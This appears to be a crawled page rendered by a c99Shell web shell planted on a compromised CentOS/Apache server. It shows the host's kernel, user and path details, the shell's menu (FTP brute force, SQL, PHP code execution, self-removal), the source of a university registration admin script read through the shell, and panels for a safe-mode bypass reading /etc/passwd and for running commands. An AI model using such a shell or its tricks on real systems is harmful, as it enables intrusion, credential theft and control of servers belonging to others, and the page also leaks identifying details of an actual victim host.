110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis/eregis/admin_/ drwxr-xr-x Free 52.31 GB of 127.8 GB (40.93%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/mis/eregis/admin_/ drwxr-xr-x
Free 52.31 GB of 127.8 GB (40.93%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?php

session_start();

include_once "../class/clsrg_CopyTimeTable.php";



$ctId = (! isset($_POST['ctId'])? "" : $_POST['ctId']);

$ctLtId = (! isset($_POST['ctLtId'])? "" : $_POST['ctLtId']);

$acadYear = (! isset($_POST['acadYear'])? "" : $_POST['acadYear']);

$semester = (! isset($_POST['semester'])? "" : $_POST['semester']);

$ctClId = (! isset($_POST['ctClId'])? "" : $_POST['ctClId']);



$conn = new Connection();



$oCt1 = new rg_CopyTimeTable();

$oCt2 = new rg_CopyTimeTable();



set_time_limit(0);



if($method=="edit"){

    if($ctClId)

        $oCt1->RSrg_CopyTimeTableByClIdAndLtId($ctClId, $ctLtId);

    else

        $oCt1->RSrg_CopyTimeTableByAcYAndSeAndLtId($acadYear, $semester, $ctLtId);

    

    while($oCt1->GetRecord()) {

        $oCt2->SearchByKey($oCt1->ctId);

        $oCt2->GetRecord();

        $oCt2->Edit();

        if(is_null($oCt2->ctRmId))

            $oCt2->ctRmId='NULL';

        if(is_null($oCt2->ctEpMepId))

            $oCt2->ctEpMepId='NULL';

        if(is_null($oCt2->ctEpSepId))

            $oCt2->ctEpSepId='NULL';

        if(is_null($oCt2->ctTtId))

            $oCt2->ctTtId='NULL';

        $oCt2->ctLtId='NULL';

        $oCt2->ctUpdateUserId=$updateUserId;

        $oCt2->ctUpdateDateTime=date('Y-m-d H:i:s');

        $oCt2->Save();

    }

    

    for($i=0; $i<count($ctId); $i++) {

        $oCt1->SearchByKey($ctId[$i]);

        if($oCt1->GetRecord()) {

            $oCt1->Edit();

            if(is_null($oCt1->ctRmId))

                $oCt1->ctRmId='NULL';

            if(is_null($oCt1->ctEpMepId))

                $oCt1->ctEpMepId='NULL';

            if(is_null($oCt1->ctEpSepId))

                $oCt1->ctEpSepId='NULL';

            if(is_null($oCt1->ctTtId))

                $oCt1->ctTtId='NULL';

            $oCt1->ctLtId=$ctLtId;

            $oCt1->ctUpdateUserId=$updateUserId;

            $oCt1->ctUpdateDateTime=date('Y-m-d H:i:s');

            $oCt1->Save();

        }

    }

}



set_time_limit(30);



$oCt1->Destroy();

$oCt2->Destroy();

$conn->Disconnect();



echo "<meta http-equiv='refresh' content='0; URL=addLTInClass.php?acadYear=$acadYear&semester=$semester&ctLtId=$ctLtId&ctClId=$ctClId'>";



?>

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: